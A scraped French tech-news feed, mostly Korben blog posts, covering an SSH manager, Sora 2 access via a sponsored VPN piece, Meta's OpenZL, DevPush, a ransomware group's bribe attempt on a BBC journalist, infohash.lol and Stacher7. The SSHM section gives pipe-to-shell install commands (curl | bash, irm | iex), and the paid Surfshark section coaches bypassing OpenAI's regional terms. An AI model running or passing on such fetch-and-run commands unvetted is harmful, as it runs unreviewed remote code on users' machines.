Concernant l’installation c’est ultra-simple. Sur macOS, Homebrew fait le job. Sur Unix/Linux, il suffit d’un script d’une ligne. Enfin, sous Windows, y’a un script PowerShell. Ou alors vous pouvez télécharger direct le binaire depuis les releases GitHub .

Homebrew pour macOS :

brew install Gu1llaum-3/sshm/sshm

Unix/Linux/macOS :

curl -sSL https://raw.githubusercontent.com/Gu1llaum-3/sshm/main/install/unix.sh | bash

Windows (PowerShell):

irm https://raw.githubusercontent.com/Gu1llaum-3/sshm/main/install/windows.ps1 | iex

Bref, Guillaume a plutôt bien géré son truc je trouve ! Comme quoi, la barrière entre “bidouille perso” et “outil communautaire reconnu” n’a jamais été aussi basse. Avec un bon framework comme Bubble Tea, une idée claire sur ce qui manque aux outils existants, et un ou deux mois de travail sérieux, et hop, on fait un miracle !

Voilà, donc si vous gérez plusieurs serveurs SSH au quotidien, SSHM vaut vraiment le coup d’œil. Un grand merci à Guillaume pour le partage, c’est trop cool !

Sora 2 - Comment y accéder depuis l'Europe ?

Par : Korben
8 octobre 2025 à 09:51
– Article en partenariat avec Surfshark

OpenAI a lancé Sora 2 fin septembre, et pour l’avoir testé, je peux vous dire que c’est un sacré bond en avant pour la génération vidéo par IA. Leur modèle génère maintenant de la vidéo ET de l’audio synchronisé, avec des dialogues, des effets sonores et des musiques réalistes…etc.

Mais il y a un hic car Sora 2 est dispo uniquement aux USA et au Canada. Le reste du monde, dont l’Europe, est donc bloqué. Mais rassurez-vous, je vais vous expliquer comment y accéder.

Sora 2 fonctionne en text-to-video et image-to-video. En gros, vous tapez une description, et le modèle génère la vidéo avec l’audio qui va bien. Comparé à la première version , Sora 2 respecte donc bien mieux la physique. Par exemple, on arrive à obtenir un ballon de basket qui rate le panier rebondit correctement sur le panneau… les mouvements sont plus cohérents, et les instructions complexes sur plusieurs plans sont suivies en gardant l’état du monde.

La fonctionnalité qui fait du bruit, c’est surtout Cameo. Vous uploadez une courte vidéo de vous, et Sora 2 peut vous insérer dans n’importe quelle scène générée. Le modèle reproduit alors votre apparence et votre voix avec assez de précision pour que ça fonctionne. Ça marche aussi avec des animaux ou des objets. OpenAI a sorti une app iOS sociale autour de ça, où vous créez des vidéos, remixez les générations des autres, et ajoutez vos potes en cameo.

Maintenant, comme je vous le disais, le problème c’est que Sora 2 est réservé aux Etats-Unis et au Canada uniquement donc si vous tentez d’y accéder depuis l’Europe, le Royaume Uni, l’Australie ou ailleurs, vous tomberez sur un message du style “Service not available in your region”. Et malheureusement, OpenAI n’a pas communiqué de dates pour l’expansion internationale, même si des sources parlent de déploiements progressifs dans les prochaines semaines.

Pourquoi Surfshark est la solution idéale pour accéder à Sora 2

Une solution technique existe pour contourner ce problème : utiliser un VPN pour apparaître aux yeux de Sora 2 comme si vous étiez aux USA ou au Canada. Et c’est là que Surfshark entre en jeu .

Surfshark dispose d’un réseau impressionnant de plus de 3200 serveurs répartis dans 100 pays, dont de nombreux serveurs performants aux États-Unis et au Canada. Les débits dépassent régulièrement 950 Mbps via le protocole WireGuard, ce qui garantit un streaming fluide et sans latence pour vos générations vidéo sur Sora 2. Fini les connexions qui rament au moment crucial.

Le gros plus de Surfshark ? Le tarif ultra-compétitif à environ 3€ par mois (avec l’offre actuelle), ce qui en fait l’un des VPN avec le meilleur rapport qualité-prix du marché. Mais ce n’est pas tout : contrairement à la plupart des concurrents, Surfshark permet des connexions simultanées illimitées. Vous pouvez protéger tous vos appareils (PC, smartphone, tablette, smart TV, et même celui de votre famille) avec un seul abonnement.

Des fonctionnalités qui vont au-delà du simple VPN

Ce qui distingue vraiment Surfshark, ce sont ses fonctionnalités avancées qui renforcent votre sécurité et votre anonymat en ligne. Le Dynamic MultiHop fait transiter votre connexion par plusieurs serveurs dans différents pays, brouillant totalement les pistes. Même les plus curieux auront du mal à vous suivre.

La plateforme Nexus centralise toute la gestion de vos paramètres de sécurité dans une interface intuitive. Vous pouvez analyser les fuites potentielles, gérer vos connexions multiples, et activer les protections avancées en quelques clics, même si vous n’êtes pas un expert technique.

Côté innovation, Surfshark ne chôme pas. Ils ont récemment déposé un brevet pour un système de chiffrement de bout en bout qui élimine les métadonnées. Contrairement aux VPN classiques qui laissent parfois des traces temporelles ou de volume, ce nouveau système efface absolument toutes les miettes numériques. Et ça ne ralentit pas votre connexion, ce qui est crucial pour du streaming 4K ou des générations vidéo gourmandes en bande passante.

Surfshark a également lancé son propre service DNS public gratuit, qui chiffre et anonymise toutes vos requêtes DNS via DNS-over-HTTPS et DNS-over-TLS. Même votre fournisseur d’accès Internet ne peut plus voir quels sites vous visitez. Et contrairement à d’autres DNS publics, Surfshark ne collecte ni ne vend vos données de navigation.

CleanWeb et Alternative ID : la protection complète

En bonus, tous les abonnements Surfshark incluent désormais CleanWeb, un bloqueur de publicités et de trackers ultra-efficace. Il fonctionne sur tous vos appareils (Windows, Mac, Android, iOS, Linux, même FireTV) et bloque non seulement les pubs classiques, mais aussi les pop-ups, les cookies invasifs, les tentatives de phishing et les sites vérolés. Vous naviguez plus vite, plus proprement, et en toute sécurité.

Et si vous voulez aller encore plus loin dans la protection de votre vie privée, Alternative ID (inclus dans l’abonnement) vous permet de générer des identités fictives (noms, adresses mail temporaires, numéros de téléphone) pour vous inscrire sur des services sans jamais donner vos vraies informations. Pratique pour tester Sora 2 ou d’autres plateformes sans se faire spammer par la suite.

Comment accéder à Sora 2 depuis l’Europe avec Surfshark

Notez quand même qu’utiliser un VPN pour contourner les restrictions géographiques d’OpenAI viole leurs conditions d’utilisation donc s’ils le décident, ils peuvent suspendre votre compte. Mais pour le moment, ce n’est arrivé à aucun utilisateur de VPN et je pense pas que ce serait dans leur intérêt.

Comme l’app Sora est dispo uniquement sur iOS pour l’instant, vous devrez aussi vous créer un compte Apple américain pour avoir l’appstore US et pouvoir installer l’app. Rien de bien compliqué et une fois que c’est installé, vous pouvez rebasculer sur votre compte FR.

Voici donc comment créer un compte Apple américain (US) :

  1. Rendez-vous sur le site https://appleid.apple.com/us/ puis cliquez sur “Create your Apple ID”.
  2. Remplissez les informations demandées (nom, date de naissance, adresse e-mail) et choisissez bien “United States” comme pays/région.
  3. Vous pouvez utiliser un numéro de téléphone français pour la validation (le préfixe +33 est accepté) en recevant un SMS pour confirmer.
  4. Validez votre adresse e-mail via le code envoyé.
  5. À la création du compte, vous pouvez choisir “None” comme mode de paiement, ce qui signifie que vous n’êtes pas obligé de fournir une carte bancaire américaine.
  6. Pour utiliser ce compte sur un appareil iOS, déconnectez votre compte Apple actuel dans AppStore > Compte > Déconnexion (tout en bas), puis connectez-vous avec votre nouvel identifiant Apple US.

Cette méthode vous permettra de créer un Apple ID pour accéder à l’App Store américain sans nécessiter obligatoirement une carte bancaire US.

Le système d’accès est en invitation pour l’instant et chaque personne invitée reçoit 4 codes à partager. TOUS LES CODES ONT ÉTÉ DISTRIBUÉS ! Maintenant si vous voulez tester Sora 2 et que vous êtes parmi les 4 premiers à m’envoyer un mail, je vous file un de mes codes d’invitation. Après ça, vous pourrez à votre tour inviter 4 personnes.

Maintenant, niveau contenu généré, on voit déjà des trucs hallucinants sur les réseaux… et aussi beaucoup de problèmes de copyright. Des users génèrent des Bobs l’Eponge, des Mario, des persos Nintendo…etc ce qui pose évidemment des questions légales mais bon, c’est rigolo quand même. OpenAI a d’ailleurs intégré un watermarking dans chaque vidéo générée, afin de pouvoir remonter la piste de chacune des générations.

En résumé : la marche à suivre

Si vous êtes en Europe et que vous voulez vraiment accéder à Sora 2 maintenant malgré les risques, voici comment ça fonctionne avec Surfshark :

  1. Installez l’application Surfshark VPN sur votre appareil
  2. Connectez-vous à un serveur US ou canadien (choisissez-en un avec une faible latence)
  3. Créez un compte Apple américain comme expliqué plus haut
  4. Installez l’app Sora via l’App Store US
  5. Normalement, vous passerez le geo-blocking sans problème

Avec Surfshark, vous bénéficiez non seulement d’un accès fiable à Sora 2, mais aussi d’une protection complète pour toute votre navigation. À environ 3 € par mois pour une sécurité sur un nombre illimité d’appareils, c’est clairement l’une des meilleures options du marché.

Ou sinon, vous attendez sagement qu’OpenAI déploie officiellement son service en Europe mais faudra être encore un peu patient.

Essayer Surfshark VPN maintenant

OpenZL - Meta lance un framework open source de compression de données structurées

Par : Korben
7 octobre 2025 à 17:17

Vous compressez vos fichiers Parquet avec gzip ? Ça marche, c’est trop cooool ! Vos CSV sont en Snappy ? Nickel c’est le bonheur !! Vos time-series sont dans un format custom que personne ne comprend sauf le dev qui est parti y’a deux ans sans laisser d’adresse ? Ah, merde…

Du coup, combien ça vous coûte vraiment ces histoires de compression ? Non, je ne parle pas en octets économisés, mais plutôt en temps humain perdu. Parce que Meta vient de publier un truc super cool qui s’appelle OpenZL et qui est un framework open source qui révèle une vérité qu’on préfère ignorer : Zuck est un reptilien euh, non… utiliser des compresseurs génériques pour tout, c’est pratique mais c’est une facture cachée qui explose !

Hé oui car les compresseurs universels comme gzip ou zstd sont géniaux, ils fonctionnent partout mais le problème c’est qu’ils ne comprennent rien à vos données. Pour eux, un CSV c’est pareil qu’un JPEG ou qu’un binaire random, du coup, vous obtenez une compression “correcte” mais rarement optimale.

Et vous vous retrouvez alors dans le cycle classique suivant : Un nouveau dataset structuré, vous tentez gzip, c’est bof. Vous essayez alors un compresseur spécialisé, mais faut l’intégrer au pipeline et franchement, la flemme. Et ça, ça vous prend combien de temps en vrai ?

Oui, je sais, vous n’en avez aucune idée mais chez Meta, ils ont évalué ça en mois de développement pour chaque nouveau type de données. Oui, des mois, pas des jours. Et après faut maintenir tout ça, gérer les versions, les dépendances, les cas particuliers…. bref.

Meta a donc fait le calcul et le partage ouvertement . Ils avaient des centaines de cas d’usage différents pour la compression de données structurées avec des fichiers Parquet, des CSV, des time-series, des tensors de machine learning, des tables de bases de données…etc et à chaque fois, soit vous prenez gzip et vous laissez de l’espace disque et de la bande passante sur la table, soit vous développez un compresseur custom et vous perdez des semaines de dev.

La solution classique consistait donc à multiplier bêtement les compresseurs spécialisés. Un pour Parquet avec Snappy, un autre pour les CSV, encore un autre pour les données numériques colonnes…etc et là ça devient vite le bordel car chaque compresseur a son décodeur, sa config, ses quirks. Vous vous retrouvez alors avec une infrastructure de compression qui ressemble à un mille-feuille de dépendances mais sans le bonheur d’une crème pâtissière de qualité.

C’est là qu’OpenZL débarque avec une approche totalement différente puisqu’au lieu de créer encore un énième compresseur spécialisé, ils ont fait un framework qui comprend la structure de vos données et génère automatiquement la meilleure stratégie de compression.

Donc en gros, vous donnez à OpenZL une description de la structure de vos données via leur Simple Data Description Language (SDDL). Ensuite leur “trainer” analyse des échantillons et trouve la séquence optimale de transformations. Ces transformations révèlent alors des patterns cachés dans vos données structurées, ce qui permet ensuite une compression beaucoup plus efficace qu’un compresseur générique aveugle.

Faut voir OpenZL comme un genre de compilateur en fait. Vous lui donnez une description haut niveau de vos données, et il génère un “plan de compression” optimisé pour ce type précis de données. Un peu comme un compilateur transforme du code haut niveau en binaire optimisé.

Et le plus beau c’est que tous les fichiers compressés par OpenZL, même avec des configs complètement différentes, se décompressent avec le même binaire. Comme ça c’est fini le casse-tête des multiples décodeurs à maintenir. Là vous avez un seul exécutable à déployer partout. Bref, c’est surtout ça la promesse de Meta avec OpenZL.

Cet outil est en prod chez eux et visiblement, comme ils le racontent sur X , il a réduit les temps de développement de mois à jours, pour des gains de compression et de vitesse systématiquement supérieurs aux compresseurs génériques. Sur des datasets Parquet par exemple, ils obtiennent des ratios de compression meilleurs que gzip tout en étant plus rapides à compresser et décompresser.

Pour vous donner un ordre de grandeur, Parquet avec gzip c’est déjà 2.37 fois plus compact qu’un CSV classique. OpenZL lui, va encore plus loin en exploitant les régularités intrinsèques des données colonnes tels que des types énumérés, des contraintes de range, des patterns temporels dans les time-series et c’est ça qui fait la différence entre un compresseur qui voit des bytes et un qui comprend la structure.

Meta considère le core d’OpenZL comme production-ready et l’utilisent en interne à large échelle depuis un petit moment. Maintenant si ça vous intéresse pour vos propres projets, sachez que le framework est sous licence BSD et dispo sur GitHub et vous avez un Quick Start guide , de la doc complète , et même un papier académique sur arXiv si vous voulez plonger dans les détails techniques du modèle graph-based qu’ils utilisent.

Voilà, si vous bossez avec des volumes importants de données structurées, si vous en avez marre de bidouiller des configs de compression, ou si vous voulez juste arrêter de payer la facture cachée des compresseurs universels, allez voir OpenZL sur GitHub .

Source

DevPush - Deployez vos apps Python comme sur Vercel

Par : Korben
7 octobre 2025 à 16:58

Vous connaissez Vercel ? Cette plateforme de déploiement qui permet de mettre en ligne une app web en deux clics. Hé bien c’est super génial… mais ça ne marche qu’avec JavaScript. Du coup, si vous faites du Python, du PHP ou autre, vous êtes un peu coincé. Snif…

C’est un peu le problème que Ronan Berder, un dev de Singapour, s’est pris en pleine poire au moment où il a voulu déployer ses apps Python aussi facilement que du Next.js sur Vercel. Comme y’avait pas grand chose qui existait, il a donc créé DevPush, une alternative open source et auto-hébergeable qui fonctionne avec tous les langages de dev.

Vous connectez votre repo GitHub, vous pushez votre code, et boom, votre app est déployée, tout ça sans coupure de service, avec possibilité de retour en arrière instantané, des logs en temps réel, des environnements multiples, du SSL automatique…etc… Bref, tout ce que vous avez sur Vercel, mais sans être limité à Node.js.

DevPush supporte donc déjà Python avec Flask, Django et FastAPI et comme c’est basé sur Docker, n’importe quel langage peut tourner dessus. Node.js, PHP, Ruby, Go, Rust… ce que vous voulez. Y’a juste à créer un conteneur Docker et c’est parti.

Ce qui est cool, c’est surtout que vous pouvez l’héberger vous-même par exemple sur un VPS… Vous gardez ainsi le contrôle de vos données sans enfermement propriétaire ni mauvaises surprises sur la facture.

Pour l’installation c’est très simple puisqu’il suffit de lancer un script bash et en 5 minutes c’est en place sur votre serveur Ubuntu ou Debian. Vous créez ensuite votre premier projet, vous liez votre repo GitHub, et vous pushez. DevPush détecte alors automatiquement le framework Python, construit l’image Docker, et déploie l’app.

Chaque push sur GitHub déclenche alors un nouveau build et vous pouvez mapper des branches à des environnements différents. Par exemple, la branche main en production, staging en préproduction, dev en développement et DevPush gère aussi les variables d’environnement de manière sécurisée, avec du chiffrement.

Les logs de build et de runtime sont également streamés en temps réel dans l’interface ce qui permet de voir exactement ce qui se passe pendant le déploiement. Comme ça, si une build plante, vous avez toutes les infos pour débugger et si vous voulez revenir en arrière, vous pouvez faire un rollback sur le commit précédent en 1 click !

DevPush génère aussi une URL de preview pour chaque déploiement ce qui permet de tester votre app avant de la mettre en prod, et quand vous êtes prêt, vous mappez ça avec votre domaine custom et DevPush s’occupe du certificat SSL automatiquement via Let’s Encrypt.

Évidemment, ce projet est encore jeune et le dev a prévu d’ajouter pas mal de nouvelles fonctionnalités comme la gestion de bases SQLite, le stockage persistant, le monitoring des ressources, le scaling, des tâches cron… mais encore un peu de patience…

Bref, si vous faites du Python ou autre chose et que vous en avez marre de gérer des serveurs à la main ou de payer un abonnement super cher sur une plateforme managée à la con, DevPush mérite le coup d’œil !

Source

Les AirPods Pro 3 ont un sérieux problème selon ce spécialiste du démontage

Les AirPods Pro 3, malgré leurs innovations technologiques comme le suivi cardiaque et une meilleure étanchéité, restent conçus de manière irréparable selon iFixit, avec des batteries collées et une structure scellée, ce qui pose question sur leur durabilité et leur impact environnemental.

L’article Les AirPods Pro 3 ont un sérieux problème selon ce spécialiste du démontage est apparu en premier sur Tom’s Hardware.

full

thumbnail

Apple M5 vs M4 : une nouvelle puce juste correcte, sans révolution

Le M5 d’Apple se distingue du M4 principalement par une mémoire cache L2 augmentée de 50 % et une RAM passée de 8 Go à 12 Go, tout en conservant une architecture CPU similaire et une fréquence d’horloge identique.

L’article Apple M5 vs M4 : une nouvelle puce juste correcte, sans révolution est apparu en premier sur Tom’s Hardware.

full

thumbnail

Un groupe de cybercriminels tente de corrompre un journaliste de la BBC

Par : Korben
30 septembre 2025 à 18:37

Un journaliste de la BBC a reçu une proposition de Medusa pour devenir leur taupe. En effet, Joe Tidy, correspondant cyber sécurité à la BBC, a été contacté en juillet 2024 par le groupe de ransomware russe pour qu’il leur file des infos sur ses collègues. Leur proposition : 600 000 livres sterling sur la table, soit environ 715 000 euros !! Je connais quelques journalistes français sous-payés qui adoreraient recevoir une telle proposition ^^

Medusa (à ne pas confondre avec MedusaLocker, c’est important) opère depuis 2021 et a déjà fait plus de 300 victimes selon les données officielles . Leur mode opératoire ? Le classique double chantage : ils chiffrent vos données ET menacent de les publier si vous ne payez pas. Les rançons vont de 100 000 dollars à 15 millions selon la taille de la victime. C’est le business !

Ce qui rend cette histoire complètement dingue, c’est que Medusa a vraiment cru pouvoir retourner un journaliste de la BBC. Le message initial de “mediaman” (subtil comme pseudo) disait texto : “Si vous pouviez nous fournir des détails sur les vulnérabilités, mots de passe ou accès à l’infrastructure BBC, nous pourrions travailler ensemble.” Autant demander à un pompier de mettre le feu à sa caserne.

Le plus drôle dans tout ça, c’est leur approche… D’après l’enquête de Joe Tidy lui-même , le contact initial s’est fait par email en juillet, suivi d’une attaque MFA bombing en août. Pour ceux qui ne connaissent pas, le MFA bombing c’est quand les hackers spamment votre téléphone de demandes d’authentification jusqu’à ce que vous craquiez et cliquiez sur “Accepter” par erreur ou parce que vous n’en pouvez plus… Sauf que Joe a reconnu ce schéma d’attaque et n’a jamais validé la demande.

Alors près avoir échoué à le hacker directement, Medusa a tenté l’approche “soft” avec une offre d’emploi. Ils lui ont proposé de devenir leur informateur privilégié, de balancer les vulnérabilités de la BBC, en échange d’un petit pot-de-vin… Le groupe lui a même envoyé des “preuves” de leur sérieux en partageant des données volées à d’autres victimes. Genre “regarde, on est des vrais méchants, on a de l’argent”.

Faut dire que cette tactique d’approche directe des employés devient de plus en plus courante. Hé oui, pourquoi s’embêter à craquer des systèmes complexes quand on peut simplement acheter quelqu’un de l’intérieur ? C’est le principe du maillon faible, mais sans Laurence Boccolini ^^ (oui, j’ai encore mangé un clown).

D’ailleurs, petite parenthèse technique : Medusa utilise un ransomware-as-a-service (RaaS) classique. Les développeurs créent le malware, les affiliés le déploient, et tout le monde se partage les gains. Le groupe opère depuis des serveurs russes et utilise Tor pour ses communications et ils ont même un blog sur le dark web où ils publient les données des victimes qui refusent de payer. C’est charmant.

Ce qui m’impressionne vraiment dans cette histoire, c’est le culot astronomique (qui a dit “la connerie” ?) des hackers… Contacter directement un journaliste cyber de la BBC pour lui proposer de devenir une taupe, fallait oser. Leur niveau de déconnexion avec la réalité est stratosphérique.

Joe Tidy a évidemment tout documenté et partagé avec les autorités et le National Crime Agency britannique et le FBI sont sur le coup. Mais bon, avec des serveurs en Russie et des opérateurs probablement basés là-bas aussi, les chances d’arrestation sont proches de zéro. C’est le problème éternel des ransomwares… Tant que certains pays servent de “sanctuaires”, les groupes de cybercriminels continueront d’opérer en toute impunité.

Quoiqu’il en soit, un employé mécontent, endetté ou simplement naïf peut faire plus de dégâts que n’importe quel exploit zero-day.

Moralité : Pour réduire vos risques cyber, payez mieux vos employés ;-)

Source

Infohash - Le site qui liste TOUS les torrents possibles

Par : Korben
30 septembre 2025 à 08:45

Vous vous souvenez de keys.lol qui permettait de parcourir toutes les clés privées Bitcoin et Ethereum possibles ? Ou de everyuuid.com qui listait tous les UUID existants ? Hé bien voici la dernière création dans cette noble lignée de l’exhaustivité : infohash.lol , le site qui énumère tous les liens magnet BitTorrent possibles, teste le nombre de peers, et récupère les métadonnées.

Je me suis dit que ça pourrait vous intéresser, parce que ce projet est aussi chouette qu’absurde…

Faut d’abord savoir qu’un infohash BitTorrent, c’est un identifiant unique pour un torrent, calculé à partir du contenu du fichier .torrent. Infohash.lol génère tous les infohash possibles et les affiche par pages de 32. Alors ça fait combien de pages au total ? Hé bien, tenez-vous bien :

**45 671 926 166 590 716 193 865 151 022 383 844 364 247 891 968 pages. **

De quoi péter un câble si on devait tout parcourir 1 par 1 !

Pour chaque infohash généré, le site interroge le DHT BitTorrent (la table de hachage distribuée qui permet de trouver des peers sans serveur centralisé) pour voir s’il existe des peers qui répondent. Et c’est là que ça devient rigolo car beaucoup d’infohash affichent un seul peer solitaire. Des fantômes du DL qui répondent à l’appel sans qu’on sache vraiment ce qu’ils conservent. Le site tente aussi de récupérer les métadonnées associées, mais comme l’explique son créateur, il n’y a aucune garantie qu’un infohash corresponde à un vrai torrent car pas mal de crawlers et d’indexeurs annoncent régulièrement des infohash aléatoires sur le réseau, créant un genre de bruit de fond cosmique.

Du coup, chercher un torrent spécifique sur infohash.lol, c’est exactement comme chercher une aiguille dans une planète constituée de foin. En fait, même pas une planète, plutôt un univers entier de foin, quoi…

Mais ce qui est génial avec ce projet (et tous les projets similaires), c’est qu’il ne crée ni n’indexe vraiment l’information. Il la révèle, plutôt car tous ces infohash existent déjà dans l’espace mathématique, quelque part entre 0 et 2^160. Le DHT BitTorrent est conçu pour être difficile à énumérer complètement. Même si une extension (BEP 51) a été créée pour permettre aux indexeurs de sampler les infohash stockés par les nœuds, elle reste très peu implémentée et bruteforcer tous les infohash reste techniquement impossible avec nos moyens actuels. Mais mathématiquement ? Ils sont tous là, qui attendent.

Ça me fait penser à la Bibliothèque de Babel de Borges , cette histoire où une bibliothèque infinie contient tous les livres possibles, donc tous les textes jamais écrits et tous ceux qui ne le seront jamais. Infohash.lol, c’est un peu la même chose appliquée au BitTorrent et quelque part dans ces 45 septillions de pages, il y a l’infohash du torrent de votre film préféré, mais aussi l’infohash d’un torrent qui n’existe pas encore et qui ne sera créé que dans 10 ans.

Maintenant c’est sympa à essayer, en vrai, ça ne sert à rien. Enfin si, à deux ou trois trucs. Le site propose par exemple des exemples concrets comme l’infohash de Ubuntu 24.04.3 (d160b8d8ea35a5b4e52837468fc8f03d55cef1f7) ou du court métrage libre Sintel (08ada5a7a6183aae1e09d831df6748d566095a10) histoire de voir que ce n’est pas du flan. Vous pouvez aussi naviguer vers la première page, la dernière page, ou une page aléatoire mais l’immense majorité des infohash ne correspondent à rien du tout… C’est juste du vide.

C’est donc exactement le même paradoxe que keys.lol où toutes les clés privées Bitcoin et Ethereum entre 1 et 2^256 sont générées à la volée, avec vérification automatique des balances. En vert si le wallet a des fonds, en jaune s’il a été utilisé mais est vide, en rouge s’il n’a jamais servi. Techniquement, votre clé privée Bitcoin est quelque part sur ce site. Mais la trouver est impossible car l’espace des clés possibles est si vaste que tous les habitants de l’univers entier pourrait la chercher pendant des milliards d’années sans tomber dessus. C’est pour ça que la cryptographie moderne fonctionne… pas grâce à des murs infranchissables, mais grâce à l’impossibilité statistique pure.

Même délire avec everyuuid.com qui contient plus de 5 septillions d’UUID v4 possibles. Le site ne les stocke pas tous (évidemment), mais utilise un mapping bijectif où chaque index correspond à exactement un UUID et vice-versa. C’est, si vous préférez, un projet satirique sur l’absurdité de vouloir tout énumérer.

Et ces trois projets ont pour point commun de prouver concrètement POURQUOI la sécurité informatique moderne fonctionne si bien. Keys.lol démontre que votre Bitcoin est protégé par l’entropie mieux qu’aucun coffre-fort physique et Infohash.lol montre que le DHT BitTorrent est sécurisé par son propre chaos. La sécurité est dans l’impossibilité statistique de trouver la bonne combinaison parmi des trillions de trillions de possibilités.

Et contrairement aux collections physiques (timbres, cartes Pokémon, dates Tinder…etc), ces sites créent des collections où TOUT existe déjà mais où posséder n’a aucun sens. Vous ne pouvez pas collectionner tous les UUID parce qu’ils existent tous simultanément dans une abstraction mathématique. C’est l’anti-collection ultime… Un genre de musée où toutes les œuvres sont exposées mais où personne ne viendra jamais toutes les voir.

Bref, comme je vous le disais en intro, infohash.lol est un projet parfaitement inutile et totalement absurde. Mais ça nous fait réaliser l’échelle “cosmique” de la cryptographie…

Source

Bang & Olufsen lance une paire d’écouteurs hors de prix plus chers qu’un iPhone 17 Pro Max

Les nouveaux écouteurs sans fil Beo Grace de Bang & Olufsen, proposés à 1 500 dollars, allient un design en aluminium et titane, une réduction de bruit adaptative améliorée et une autonomie de 4,5 heures, ciblant une clientèle exigeante malgré une concurrence grand public plus accessible.

L’article Bang & Olufsen lance une paire d’écouteurs hors de prix plus chers qu’un iPhone 17 Pro Max est apparu en premier sur Tom’s Hardware.

full

thumbnail

Stacher7 - Le meilleur téléchargeur YouTube dont personne ne vous parle

Par : Korben
20 septembre 2025 à 17:40

Bon, déjà, je sais pourquoi vous êtes là…

Vous cherchez un moyen de télécharger des vidéos YouTube sans vous faire emmerder par 50 pubs, sans installer un malware déguisé en “YouTube Downloader Pro Ultimate 2025”, et surtout sans payer un abonnement mensuel pour un truc qui devrait être gratuit.

Alors bonne nouvelle ! Stacher7 fait exactement ça !!

Mauvaise nouvelle, vos sites tech préférés ne vous en parleront jamais parce que YouTube appartient à Google, et Google c’est 80% de leurs revenus publicitaires. Sniiif…

Alors Stacher7, c’est quoi concrètement ? Hé bien c’est une interface graphique pour yt-dlp, le couteau suisse du téléchargement vidéo. En gros, yt-dlp c’est un fork de youtube-dl qui marche extrêmement bien, qui est mis à jour régulièrement, et qui sait télécharger des vidéos depuis plus de 1000 sites différents… Facebook, Instagram, Vimeo, Dailymotion, Twitter… Si ça se lit dans une page web, alors yt-dlp peut le télécharger.

Le problème avec yt-dlp, c’est que c’est de la ligne de commande. Et ça je sais que vous n’aimez pas tous. C’est là que Stacher7 entre en jeu puisque c’est une interface moderne et intuitive qui transforme cette ligne de commande barbare en quelques clics de souris.

Vous y collez votre URL ( par exemple ma dernière vidéo youtube ), vous choisissez votre format (MP4, MKV, AVI, ou juste l’audio en MP3), vous sélectionnez la qualité (jusqu’à la 4K si la vidéo le permet), et hop, c’est parti. Stacher7 peut même télécharger des playlists entières ou des chaînes Youtube complètes ce qui est très pratique quand vous voulez archiver toute une série de tutos avant qu’elle disparaisse ou pour les regarder plus tard en offline.

Ce qui est cool aussi avec Stacher7, c’est qu’il ne se contente pas de télécharger bêtement. Le logiciel est capable de faire du montage basique tel que recadrer des vidéos, incruster les sous-titres, créer des GIFs, convertir automatiquement vers différents formats pour que ça marche par exemple sur un smartphone, une tablette ou une console. C’est pas Adobe Premiere c’est sûr, mais pour les besoins de base, c’est largement suffisant.

D’ailleurs, petite parenthèse technique, Stacher7 installe automatiquement yt-dlp au premier lancement, mais vous pouvez le configurer pour utiliser n’importe quel fork de youtube-dl si vous préférez. C’est ça la beauté de l’open source ! Enfin, presque open source car Stacher7 lui-même est gratuit mais le code reste propriétaire, contrairement à des alternatives comme Cobalt Tools dont je vous ai déjà parlé qui lui est 100% open source.

Le truc marrant avec ces outils c’est que télécharger des vidéos pour un usage personnel, c’est légal dans plein de pays. En France, la copie privée est un droit, aux États-Unis, le fair use permet aussi certains usages, mais bon, ça n’empêche pas que Google déteste ça et n’hésite pas à désactiver Adsense aux média qui oseraient aborder des sujets allant à l’encontre de la “réglementation liée aux usages des outils Google”.

Bref, Stacher7, c’est rapide, c’est gratuit et c’est disponible sur Windows, Mac et Linux en cliquant ici !

YouTube déploie de nouveaux outils d’IA pour les créateurs et spectateurs en 2025

En 2025, YouTube déploie des outils d’IA pour faciliter la création (génération de vidéos, montage automatisé, musique), optimiser la monétisation (partenariats flexibles, shopping intégré) et améliorer les lives (diffusion multi-format, jeux interactifs), tout en renforçant la transparence (watermarks) et la protection des créateurs (détection des deepfakes).

L’article YouTube déploie de nouveaux outils d’IA pour les créateurs et spectateurs en 2025 est apparu en premier sur Tom’s Hardware.

full

thumbnail
❌
❌